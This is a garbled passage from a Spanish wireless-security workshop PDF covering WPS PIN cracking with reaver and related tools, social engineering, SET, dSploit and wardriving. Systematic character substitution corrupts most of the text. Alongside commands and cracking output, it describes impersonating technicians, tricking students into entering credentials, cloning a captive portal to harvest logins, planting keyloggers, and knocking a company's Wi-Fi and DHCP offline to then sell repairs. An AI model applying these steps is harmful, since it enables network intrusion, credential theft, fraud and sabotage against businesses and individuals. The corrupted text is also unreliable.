4ara lanKar la herramienta introduciremo!reaver -i mon0 -b ]mac^ -vv!onde ]mac^ es la mac del router objetivoEmpe3ara el ata5ue + si todo va bien) veremos cómo van pasando los pinesNos ira mostrando el porcentaje + al inal nos dará el pin correcto + la clave$%.Esta 7erramienta tambi6n 7a sido retocada) para probar primero los pines delos router 5ue se conoce 5ue utili3an un pin gen6rico o uno conocidoCon esta 7erramienta lo 5ue 7aremos es probar los pins de la red objetivo.

230

Page 231: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 231/260

%reviamente tenemos 5ue usar otro programa para escanear las redes conwps activado como *o+script $%' +a 5ue tenemos 5ue saber la ,acobjetivo para ponerla en las opciones. *o+script $%' +a tiene integradoReaver +a 5ue lo podemos usar directamente al ejecutar la aplicación sin

necesidad de lan3ar Reaver en una nueva ventana.Este comando básico tiene muc7as variables. l al lan3ar la 7erramientas nos aparecen todas las posibles opciones

Reaver v=.4-r==F $ii %rotected 'etup ttac/ 1oolCop+rig7t 8c9 <0==) 1actical Networ/ 'olutions) Craig ener ]c7enerftacnetsol.com^

Re5uired rguments-i) --interace[]wlan^ Name o t7e monitor-mode interace to use

-b) --bssid[]mac^ (''I! o t7e target %

>ptional rguments-m) --mac[]mac^ ,C o t7e 7ost s+stem-e) --essid[]ssid^ E''I! o t7e target %-c) --c7annel[]c7annel^ 'et t7e ;0<.== c7annel or t7e interace

8implies -9-o) --out-ile[]ile^ 'end output to a log ile _stdout`-s) --session[]ile^ Restore a previous session ile-C) --e#ec[]command^ E#ecute t7e supplied command upon

successul pin recover+-!) --daemoni3e !aemoni3e reaver-a) --auto uto detect t7e best advanced options or t7e

target %-) --i#ed !isable c7annel 7opping-A) --Ag73 &se A*3 ;0<.== c7annels-v) --verbose !ispla+ non-critical warnings 8-vv or more9-5) --5uiet >nl+ displa+ critical messages-7) --7elp '7ow 7elp

 dvanced >ptions-p) --pin[]wps pin^ &se t7e speciied 4 or ; digit $%' pin-d) --dela+[]seconds^ 'et t7e dela+ between pin attempts _=`-l) --loc/-dela+[]seconds^ 'et t7e time to wait i t7e % loc/s $%'

pin attempts _0`-g) --ma#-attempts[]num^ Quit ater num pin attempts-#) --ail-wait[]seconds^ 'et t7e time to sleep ater =0 une#pected

ailures _0`-r) --recurring-dela+[]#+^ 'leep or + seconds ever+ # pin attempts

231

Page 232: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 232/260

-t) --timeout[]seconds^ 'et t7e receive timeout period _A`-1) --mAM-timeout[]seconds^ 'et t7e ,A?,M timeout period _0.<0`-) --no-associate !o not associate wit7 t7e % 8association

must be done b+ anot7er application9

-N) --no-nac/s !o not send NC messages w7en out o order pac/ets are received-') --d7-small &se small ! /e+s to improve crac/ speed-") --ignore-loc/s Ignore loc/ed state reported b+ t7e target %-E) --eap-terminate 1erminate eac7 $%' session wit7 an E%

I" pac/et-n) --nac/ 1arget % alwa+s sends a NC _uto`-w) --winM ,imic a $indows M registrar _alse`

E#ample

reaver -i mon0 -b 00F04CC=C<= -vv

Rea@er ,+ Es la misma 7erramienta 5ue la anterior pero en su versión previa 8la =.D9

Rea@ermodEs la misma 7erramienta pero modiicada + optimi3ada solo para routers 5ueempie3an por ;c0caD

Sal@ar Se!ione! Bullerramienta 5ue crea el ic7ero 'alvar-sesiones-bull+.#3m en el escritorio.Este arc7ivo contiene las sesiones de la 7erramienta (ull+ dentro de unmodulo de para sistemas 'la#.!espues de crearlo nos avisa para 5ue lo guardemos en la carpeta,odules ?mnt?sdb=?wiisla#?modules?!onde sdb= es el pendrive usb donde tenemos $iisla#Esto es mu+ util +a 5ue cuando iniciamos de nuevo $iisla# en modo livecargara las sesiones con las 5ue estabamos trabajando.

Sal@ar Se!ione! Rea@ererramienta 5ue crea el ic7ero reaver-wps-session-attac/-'BE!.#3m en elescritorio.Este arc7ivo contiene las sesiones de la 7erramienta (ull+ dentro de unmodulo de para sistemas 'la#.!espues de crearlo nos avisa para 5ue lo guardemos en la carpeta,odules ?mnt?sdb=?wiisla#?modules?!onde sdb= es el pendrive usb donde tenemos $iisla#Esto es mu+ util +a 5ue cuando iniciamos de nuevo $iisla# en modo livecargara las sesiones con las 5ue estabamos trabajando. 

232

Page 233: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 233/260

.4SCrac7GUIerramienta con interace gráica 8*&I9 para crac/ear redes con $%'activado reali3ada por rgentina $ireless 87ttp??www.arg-wireless.com.ar 9

!river%rimero le damos a ,odo monitor ctivar+ selecionamos la intera3 mon0EscaneoIntera3mon0"a 7erramienta nos da varias opciones para escanear las redes con $%'activado$as7airodump$%'can$%'p+"e damos a la 5ue 5ueramos + empe3ará a escanear las redes con $%'.&na ve3 escaneadas las redes copiamos la ,C de la red objetivo"a pegamos en el apartado ta5ue + le damos a ta5ue.

.4S4inGeneratorerramienta creada por el e5uipo de seguirdadwireless.net) 5ue nos muestra

los objetivos con $%' activado + además coteja su dirección ,C con su

233

Page 234: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 234/260

base de datos para comprobar si el router utili3a un pin con patrón conocidoo gen6rico.!e ser as2) se obtiene el pin + la clave $% en segundosEl men: es mu+ intuitivo + sencillo, e!canear Nos pedirá 5ue seleccionemos interace para montar en modo monitor !espu6s el tiempo 5ue estará reaver escaneando 8por deecto D0seg9Y por :ltimo los canales en los 5ue 5ueremos escanear 8por deecto de = al=49* o3tener cla@e'i la ,C) no se encuentra en la base de datos) probara un pin gen6rico porsi acaso + si no es válido) nos lo indicara + nos pedirá 5ue seleccionemosotra red."as ,ac 5ue están en la base de datos se muestra con un FSI de color

verde'eleccionamos la red a auditar + seguidamente seleccionamos la opción <para obtener clave con reaver Nos mostrara el pin + la clave + la guardara en root!#irele!!.4S4inGenerator6e!BSSID -Mac0+t'tEl programa crea automaticamente un arc7ivo de te#to cu+o nombre es elnombre de la red o bssid + la mac ente parentesis. !entro del arc7ivopodemos ver el pin + la clave $%.

erramienta para crac/ear redes con $%' probando pines.Bamos a ver lo 5ue nos aparece al iniciar el programa  ' ' ' ' H= ' ' ' ' ' '=' ' ' ' = ' ' ' ' '' ' Penerat!r 3.0

(((.se#uridad(ireless.net 

LLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL

L TT Kased !n ^ha!hunshen# (!rk y kcdtv scrit DD LLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL)ersi\n base de dat!s* 26022014------------------------------------

1= Kuscar !betiv!s c!n $+ activad!2= +r!bar +%/ #enric!'calculad! !r al#!ritm!3= +r!bar t!d!s l!s !sibles ines H"uerAa bruta=4= elecci!nar !tr! !betiv!0= alir<D 1

234

Page 235: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 235/260

  --D %ntr!duce en se#und!s el tiem! de esera ara escanear H30 !rde"ect!=*Hnter=

--D %ntr!duce nmer! de canal a escanear F1-14N H!d!s !r de"ect!=*

Hnter=

scaneand! en busca de !betiv!s... 17 se#und!s HtrlQ ara detener=

K%; hannel R% )ersi!n !cked %;-------------------------------------------------------------------------00*1;*1*10*80* 13 -90 1.0 /! an!is168*K6*&*7*7*18 5 -90 1.0 /! (imediaR-5005

as si#uientes redes s!n suscetibles de ataue c!n R)R

K%; l#!ritm! Penric! !ck eal an>l %;

1= 00*1;*1*10*80* IJ /: /: 10 13 an!is12= 68*K6*&*7*7*18 IJ /: /: 10 5 (imediaR-5005

v= )er'!cultar "abricantes0= )!lver al men

--D elecci!ne una red1

%/&: + :K%):%; G an!is1K%; G 00*1;*1*10*80*anal G 13

+%/ #enric! G ;esc!n!cid!l#!ritm! !mute+%/ G 10815489l#!ritm! as,b!$+ G 10940747------------------------------------

1= Kuscar !betiv!s c!n $+ activad!

2= +r!bar +%/ #enric!'calculad! !r al#!ritm!3= +r!bar t!d!s l!s !sibles ines H"uerAa bruta=4= elecci!nar !tr! !betiv!0= alir<D 2

+r!band! c!n al#!ritm! !mute+%/... HtrlQ ara detener=

FQN (itchin# m!n0 t! channel 13FQN $aitin# "!r beac!n "r!m 00*1;*1*10*80*

235

Page 236: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 236/260

uE la herramienta r!bar> el +%/ #enric!'calculad!i este ataue n! "unci!na debem!s seleci!nar el 3*3= +r!bar t!d!s l!s !sibles ines H"uerAa bruta=

.a!h

erramienta para escanear redes con $%' activado.Con esta 7erramienta detectaremos todos los % 5ue tenga el protocolo$%' activado) primero + desde la consola tendremos 5ue tener nuestrainterace) montada en modo monitor Comandoairmon-ng star wlan0!onde wlan0 es nuestra interace wii&na ve3 7ec7o esto solo tendremos 5ue poner en la consolaComando

was7 -i mon0 -C!onde mon0 es nuestra interace wii en modo monitor + comen3ara el escaneo de redes con wps activado.Esta 7erramienta N> sirve para lan3ar ata5ues a $%') es solo para ver posibles objetivo. &na ve3 5ue veamos la red 5ue 5ueremos auditar)utili3aremos cual5uiera de las 7erramientas 5ue anali3aremos acontinuación.

 l iniciar la 7erramienta podemos ver las distintas opciones disponibles

$as7 v=.4-r==F $ii %rotected 'etup 'can 1oolCop+rig7t 8c9 <0==) 1actical Networ/ 'olutions) Craig ener ]c7enerftacnetsol.com^

Re5uired rguments-i) --interace[]iace^ Interace to capture pac/ets on-) --ile _I"E= I"E< I"ED ...` Read pac/ets rom capture iles

>ptional rguments-c) --c7annel[]num^ C7annel to listen on _auto`-o) --out-ile[]ile^ $rite data to ile-n) --probes[]num^ ,a#imum number o probes to send to

eac7 % in scan mode _=A`-!) --daemoni3e !aemoni3e was7-C) --ignore-cs Ignore rame c7ec/sum errors-A) --Ag73 &se A*3 ;0<.== c7annels-s) --scan &se scan mode-u) --surve+ &se surve+ mode _deault`

-7) --7elp '7ow 7elp

236

Page 237: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 237/260

E#amplewas7 -i mon0

.4SHi erramienta automatica para escanear + crac/ear redes con $%' activado

 

%" +,th!n has a ^enC $+ has a Bi H氣=

$+-i - 2013 - P+ v.3

+ress /R t! startFiN - illin# revi!us m!nit!r inter"aces

- killin# m!n0VWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWXY %nter"aces YZWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW[VWWWWzWWWWWWWzWWWWWWWWWWWWWWWWWWWzWWWWWWWWWWzWWWWWWWWWWzWWWWWWWWWXY %; p %"ace p M p %+ p ;R%)R p)/;:R Y{|||||}Y 1 p (lan0 p 00*17*c4*d3*90*54 p ther!s p R9280 p B/ M%R:? Y

ZWWWW~WWWWWWW~WWWWWWWWWWWWWWWW~WWWWWWWWWW~WWWWWWWWWW~WWWWWWWWWWWWW[FJN - ress /R t! c!ntinue (ith this deviceFiN - settin# u m!de m!nit!r !n (lan0 deviceFQN - M!de m!nit!r !n m!n0 deviceFiN - urrent M ddress is 00*17*c4*d3*90*54

- cannin# $+ tar#ets...- ut! can. H20 sec!nds=

••••••••••••••••••••••••• 100- killin# (ash r!cesses.

FQN - can c!mlete.VWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWX

Y ar#ets YZWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW[VWWWWzWWWWWzWWWWzWWWWWWWWWWWWWWWWWzWWWWWzWWWWWWWWWWWWWWWWWWzWWWXY %; p +$R p p %; p p M ;;R p )/;:R Y{||||||}Y 1 p 16 p 01 p $/553 p /! p 8*0*3*2*55*3 p M+R YZWWWW~WWWWW~WWWW~WWWWWWWWWWWWWWWWW~WWWWW~WWWWWWWWWWWWWWWWWWW~WW[  - vailable :ti!ns* F0C 1NFJN - elect a tar#et !r t,e 0 t! scan a#ain*1

- crackin# (ith bull,

237

Page 238: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 238/260

Wpsig erramienta ara !btener in"!rmaci\n s!bre redes c!n $+.l iniciar la herramienta n!s muestra las distintas !ci!nes ue tiene*

$i-&i +r!tected etu %n"!rmati!n Patherin#.

sa#e* (si#., -i inter"ace -( lename:ti!ns*

-hC --hel sh!( this hel messa#e and eit-i %&C --inter"aceG%&

net(!rk inter"ace.-( &%/MC --(riteG&%/M

!utut lename.-s :RC --s!urceG:R

s!urce mac address.-C --assive av!id inectin# "rames.

De@elopmenterramientas de desarrollo para construir aplicaciones e interaces gráicaspara aplicaciones.

CMa7eerramienta con entorno gráico 8*&I9 para compilar el codigo uente deprojectos de sotware.

 

238

Page 239: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 239/260

Editor de te'to! SciTEEditor de te#tos especialmente diseado para escribir codigo uente endistintos lenguajes de programación.

Glade&n diseador de interaces para *1h + *N>,E.

239

Page 240: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 240/260

=t; A!!i!tant erramienta para presentar documentación online.

240

Page 241: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 241/260

=t; Con$iguration erramienta para conigurar las opciones de las 7erramientas con interacegraica 8*&I9 5ue usan Qt.

241

Page 242: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 242/260

=t; De!igner  !iseador de interace gráicas 8*&I9 para aplicaciones Qt.

242

Page 243: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 243/260

=t; Lingui!tic erramienta para aadir traducciones a aplicaciones Qt.

Gr%$ico!erramientas para tratamiento de gráicos

Captura de pantalla erramienta para capturar la pantalla

243

Page 244: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 244/260

Page 245: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 245/260

Internet erramientas de internet.

Con7net

erramienta para monitori3ar las cone#iones de red.

Con7net !top %ara desactivar Con/+-net

E'aminador de !er@idore! SS1 de A@ahiE#amina los servidores '' 5ue se estan ejecutando en la red del dominio5ue selecionemos.

245

Page 246: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 246/260

E'aminador de !er@idore! &NC de A@ahiE#amina los servidores BNC 5ue se estan ejecutando en la red del dominio5ue selecionemos.

/ire$o'amoso e#plorador de internet

/ire$o' Languageerramienta para selecionar el lenguaje de ireo#. 

Guardar con$iguraci"n Google ChromeCrea un modulo con la coniguración *oogle C7rome en el escritorio.

'i 5ueremos usarlo en el pro#imo inicio debemos copiarlo a la carpeta?wiisla#?modules?

Guardar con$iguraci"n /ire$o'

Crea un modulo con la coniguración ireo# en el escritorio.'i 5ueremos usarlo en el pro#imo inicio debemos copiarlo a la carpeta?wiisla#?modules?

noip'cript de auto coniguracion para "inu# del servicio de www.no-ip.com 

.e31TTrac7 Bro#!er Mirrored .e3!iteerramienta para e#plorar los sitio web espejo 8mirrored9

246

Page 247: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 247/260

Page 248: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 248/260

Email"os emails enviados pueden contener inormación interesante para losusuarios + ser bastante llamativos como la imaginación lo permita. !esde

otos de amosas 7asta cómo construir un reactor nuclear .En los arc7ivos adjuntos pueden e#istir virus ) gusanos ) bac/doors ) etc.permitiendo tener acceso total al atacante.

!ispositivo de almacenamientoEl auditor deja un dispositivo de almacenamiento como una memoria usb) sd)C! o !B! en un lugar donde pueda ser encontrado) mientras espera a 5uela v2ctima introdu3ca el dispositivo en el e5uipo para inectarseautomaticamente con el código malicioso.

  trav6s de la curiosidad 7umana es posible llevar a cabo este tipo de

ata5ue.

'uplantación de identidadConsiste en caracteri3ar a una persona) un rol. *eneralmente los roles másempleados son soporte t6cnico) tecnico inormatico) gerente) encargado) etc.En empresas grandes es di2cil conocer a todos los empleados + alsiicar laidentidad resulta ,u+ 'impleP

'7oulder 'uringConsiste en entablar una conversación con el usuario) mirar + memori3ar lasteclas 5ue presiona el usuario al momento de ingresar sus credenciales deacceso.

>ice 'nooping,uc7os usuarios no dejan blo5ueadas sus %Cs cuando se levantan de susescritorios o peor a:n cuando se retiran del trabajo) por lo tanto es posibleacceder isicamente a su %C + a sus datos sin necesidad de identiicarse.

Ingenier2a 'ocial Inversa

El auditor trata de parecer un tecnico inormatico con muc7os conocimientos)para 5ue le accedan a 6l para cual5uier tema inormatico + as2 obtener inormación.

1odas estas t6cnicas re5uieren) una preparación e investigación previa sobreel obetivo) tener 7abilidades de persuasión + la capacidad para crear relaciones estables + duraderas con las personas.

248

Page 249: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 249/260

Bamos a ver ejemplos de t6cnicas de ingenier2a 'ocial en distintos entornosCa$eter2a! Bare!Este es el caso mas ácil. 'i vamos a un bar o local p:blico tenemos 5uepreguntar si tiene wii + su clave. Normalmente nos acilitan la clave sin

problema lo 5ue nos a7orrara muc7o tiempo de auditoria para obtener laclave + podemos ir directamente a auditar la red desde dentro con7erramientas ,I1,) etc.

Empre!a!En este caso es algo mas complicado. No todas las empresas tienen redeswii + en el caso 5ue tengan no es acil obtener la clave. "o 5ue buscaremosen este caso es el acceso isico a la red + los dispositivos.

En este caso tenemos varias alternativas

Suplantaci"n de identidad5 lguien llama indicando 5ue tiene 5ue revisar la red 7aciendose pasar por sut6cnico inormatico) empresa teleonica) etc. &na ve3 en la empresa 7aremosunas revisiones rutinarias de la red. %rimero miramos el modelo del router wii 8si miramos en la parte de abajo del router en muc7os de ellos pone elmodelo) la ip para acceder + las clave por deecto9. Nos conectamos por cable de red al router ponemos su ip + las claves + podremos ver toda laconiguración de la red + la coniguración wii incluida la clave de la red.'i en el propio router no pone las claves por deecto buscamos en internet elmanual del router + en el vendrá la ip de acceso + clave por deecto.>tra orma de ver la clave de la red wii si no llevamos nuestro portatil esdesde cual5uier e5uipo conectado a la wii le damos sobre el icono de la redwii 8esta al lado del reloj9) vamos a la red conectada) pulsamos botónderec7o) propiedades) seguridad) mostrar contrasea + veremos lacontrasea de la red.1ambi6n podemos preguntar a alguien la clave.Incluso si tenemos acceso 2sico a alg:n e5uipo de la red podemos instalar alg:n programa malicioso) /e+logger o de acceso remoto.

Ser@icio t>cnico in$orm%tico5'i nos dedicamos a la consultora inormática + orecemos servicio t6cnicopodemos visitar a la empresa para orecer nuestros servicios. !ado 5ue lomas seguro es 5ue no nos contrate debemos antes 7acer algunos de estosata5ues con 7erramientas 5ue +a vimos su uncionamiento previamenteAp/uc7er  %ara dejar sin servicio la red wii. !ebemos tener un portátilcerca de la red wii con el p-uc/er ejecutándose en G!estruction modeH. er!inia %ara 7acer un ata5ue !o' !+namic ost Coniguration %rotocol8!C%9 dejando sin servicio el servidor !C%. rriba podemos ver como se

249

Page 250: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 250/260

7ace el ata5ue. o+ en d2a la ma+or2a de redes están coniguradas con!C% para asignar dinamicamente las ips a los e5uipos 5ue se conecten. ldejar sin servicio el servidor !C% no se le asignaran ips a los e5uipos por lo5ue no se podrán conectar a la red. 'i

%osteriormente al ata5ue si la empresa no nos llama les llamaremos ovisitaremos la empresa para preguntarle si re5uiere de nuestros servicios. "omas seguro es 5ue 5uiera 5ue va+amos a resolverle el problema 5ue tienenen la red. &na ve3 en la empresa con nuestro portátil + memoria usbtendremos acceso 2sico a la red + a los dispositivos por lo 5ue podremos7acer casi lo 5ue 5ueramos.

Uni@er!idade!Normalmente todas las universidades tienen una red wii de acceso e#clusivo

para los estudiantes con un portal cautivo o si no tiene portal cautivo conacceso a trav6s de credenciales.'i estamos matriculados debemos ponernos en contacto con eldepartamento de inormática de la universidad para 5ue nos aciliten lascredenciales de acceso.'i no estamos matriculados + 5ueremos acceder a la red lo mas sencillo7ablar con un alumno de la universidad. !ebemos e#plicarle 5ue tenemos5ue mandar un email urgente o acceder a un sitio de Internet para 7acer unareserva o cual5uier otra cosa 5ue tengamos 5ue 7acer en Internet + si por avor puede introducir sus credenciales en nuestro pc. En la ma+or2a de loscasos accederán a 7acerlo. 'i al primero 5ue preguntamos no lo 7aceprobamos con otro.Como :ltima alternativa si nadie nos pone sus credenciales en nuestroe5uipo lo 5ue podemos 7acer es clonar el portal cautivo de la universidad ennuestro pc) crear un punto de acceso con el portal cautivo + esperar a 5uealguien meta sus credenciales. Esto lo podemos 7acer por ejemplo con la7erramienta El Ca3ador Ca3ado como +a vimos o alguna 7erramienta similar.

erramientas inormáticas de Ingenier2a 'ocial

The Social Engineer Tool7it -SET0"a 7erramienta tiene multitud de opciones como clonar webs) reali3ar env2osde correo masivos) inectar pendrives) etc.

 l iniciarla nos aparece lo siguiente

250

Page 251: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 251/260

Nos aparece un men: de selección + seg:n la opción 5ue elijamos nosaparecerán otros submenus. "a 7erramienta es mu+ completa + permitem:ltiples opciones para obtener datos de logins + otos datos.

erramienta incluida en distribuciones como ali "inu# + (ac/trac/.Como instalar 'E1 brimos terminal + ponemossudo apt-get install git 8si no tenemos git instalado9git clone 7ttps??git7ub.com?trustedsec?social-engineer-tool/it set?Bamos a la carpeta set? + ponemos.?setup.p+ install%a abrirla ponemossetool/it%ara usar 'E1 es necesario varias 7erramientas. continuación las

ponemos junto con el comando para instalarlasEttercap sudo apt-get install ettercap-grap7ical'endmail sudo apt-get install sendmailOava sudo apt-get install openjd/--jd/

 pac7e sudo apt-get install apac7e<

,anual de uso de la 7erramienta7ttp??www.aldeid.com?wi/i?'ocial-Engineer-1ool/it-'E1  Bideotutorial

7ttps??www.+outube.com?watc7Sv[/<D>mYCE'&Y 

251

Page 252: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 252/260

$ebsite7ttps??www.trustedsec.com?downloads?social-engineer-tool/it? 

1erramienta! para Android

  continuación vamos a ver las 7erramientas de seguridad inalambrica masimportantes para ndroid + como utili3arlas.

dSploitd'ploit es un aplicación de ndroid 5ue re:ne distintas 7erramientas para elanálisis + pentesting de redes en una sola suite uniicada. %ermite reali3ar pruebas de seguridad de la red en la 5ue se encuentra conectada eldispositivo móvil) lo 5ue puede a+udar a 7acer tests de seguridad en clientes5ue 7a+a 5ue auditar ad-7oc.%ara poder instalar esta aplicación es necesario tener rooteado el sistema

 ndroid del terminal móvil donde se va+a a instalar. Es posible 5ue una ve3terminado el proceso de instalación) la aplicación solicite la 5ue se descarguetambi6n (us+(o# 87ttp??www.bus+bo#.net9. %or lo general) las distintas7erramientas 5ue se utili3an para rootear el móvil o la R>, personali3adas+a inclu+en (us+(o#) sin embargo) podr2a darse el caso de 5ue no est6instalada o 5ue esta sea antigua.Cuando a aplicación est6 en el sistema operativo ndroid + se le 7a+a dadopermisos de superusuario) la pantalla principal 5ue orece es unavisuali3ación con el mapeo de la red a la 5ue estemos conectados) donde selistaran todos los dispositivos 5ue 7a+an sido locali3ados. En esta pantalla sepueden reali3ar el listado de acciones 5ue tiene 5ue ver con el escaneo deredes $ii + el crac/ing de claves conocidas de determinados tipos depuntos de acceso o routers.'itio web7ttp??www.dsploit.net 

Reporte de Auditoria!$iisla# por deecto no trae incluidas 7erramientas de reporte de auditoriaswii. %or ese motivo vamos a e#plicar brevemente como se usan las7erramientas de reporte de auditoria 8Reporting 1ools9 de ali "inu#.

 lgunas de estas 7erramientas como maltengo están incluidas en uno de losmódulos disponibles de $iisla# 5ue podemos descargar de a5u27ttp??www.wiisla#.com?0<A-pentestTtools-i4;-=4sw-#3m? El resto podemos descargar el pa5uete + crear el modulo como vimos en elinicio de este taller.Reporting 1ools

ca!e$ileerramienta para ver gráicamente la inormación obtenida tanto online comooline.

252

Page 253: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 253/260

%odemos ver como se usa la 7erramienta en7ttp??www.gee/+s7ows.com?<0=D?0M?7ow-to-use-maltego-caseile-in-/ali.7tml

7eepnote

erramienta para guardar notas + organi3arlas de manera estructurada.%odemos ver como se usa la 7erramienta en7ttp??/eepnote.org?manual? 

magictree,agic1ree es una 7erramienta para aumentar la productividad de los 5uereali3an tests de penetración . Está diseado para permitir una ácil + directaconsolidación de datos) consulta) ejecución de comandos e#ternos + lageneración de inormes. @1reeH 8árbol9 se debe a 5ue todos los datos sealmacenan en una estructura de árbol) + @,agic@ se debe a 5ue está

diseado para 7acer arte de magia en la parte más engorrosa + aburrida delas pruebas de penetración) la gestión + presentación de los datos.%odemos ver como se usa la 7erramienta en7ttp??www.gremwell.com?usingTmagictreeT5uic/Tintro 

maltego,altego) es una aplicación de código abierto de inteligencia + orense.,altego es una 7erramienta con interace gráica 8*&I9 de recopilación deinormación 5ue le permite ver visualmente las relaciones.,altego permite enumerar inormación de red + dominio como‚ Nombres de !ominio‚ Inormación $7ois‚ "os nombres !N'‚ Netbloc/s‚ !irecciones I%) etc%odemos ver como se usa la 7erramienta en7ttp??www.gee/+s7ows.com?<0=D?0M?7ow-to-use-maltego-in-/ali-linu#.7tml 

metagoo$il

erramienta para e#traer metadatos de sitios web.Ejemplo de comando 5ue usariamos p+t7on metagooil.p+ -d victim.net -l <0 - all -o output.7tml -t temp%odemos ver como se usa la 7erramienta en7ttp??www.e7ac/ing.net?<0==?=<?metagooil-bac/trac/-A-tutorial.7tml 

Como realiKar un mapa de punto! de acce!o%ara reali3ar un mapa de los puntos de acceso de nuestra 3ona necesitamosdos cosas

253

Page 254: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 254/260

• !ispositivo con gps 8ordenador portátil o un móvil9• 'otware de escaneo

!ado la gran prolieración en la actualidad de móviles con ndroid + *%'incorporado vamos a usar un móvil android para escanear las redes wii +

posteriormente meterlas en el mapa. Bamos a e#plicar a continuación lospasos a seguir =\ !ebemos instalar la applicación de escaneo en nuestro teleono ndroid.a+ muc7as pero vamos a usar $igle $ii $ardriving +a 5ue vamos a subir la inormación obtenida al mapa de redes wii online $igle. %odemosdescargarlo de 7ttps??pla+.google.com?store?apps?detailsSid[net.wigle.wigleandroid 

 ctivamos el *%' + abrimos la aplicación. En la primera pestaa) "istpodemos ver todas la lista de todos redes wii cercanas + arriba tenemos un

botón para subir los datos obtenidos a $igle

254

Page 255: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 255/260

En la siguiente pestaa) ,ap) podemos ver nuestra posición en el mapa + laposición de las redes wii cercanas.'i pulsamos sobre una de las redes wii) nos aparecera la inormación de lamisma tal) dandonos la opción de conectarnos a ellaEn la pestaa 'ettings podemos establecer los parametros de coniguraciónasi como el usuario + contrasea

de

$igle 

a+ muc7os mapas de redes wii online. Nosotros vamos a usar $igle +a5ue es de acceso libre + ademas unciona con la aplicación de android deescaneo 5ue usamos $igle $ii $ardriving.%ara consultar el mapa con los datos de las redes wii podemos 7acerlodesde la propia aplicación android o desde la web $igle.net

255

Page 256: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 256/260

'itio web 7ttps??wigle.net?gps?gps?,ap?onlinemap<? 

Como montar una red #i$i con$igurar lo! repetidore!

Necesitamos- &n router wii con cone#ión a internet con- &n portátil o móvil con wii para detectar la cobertura- &n punto de acceso 5ue usaremos como repetidor 8usaremos un 1%-"in/9

C"mo con$igurar un punto de acce!o como repetidor+

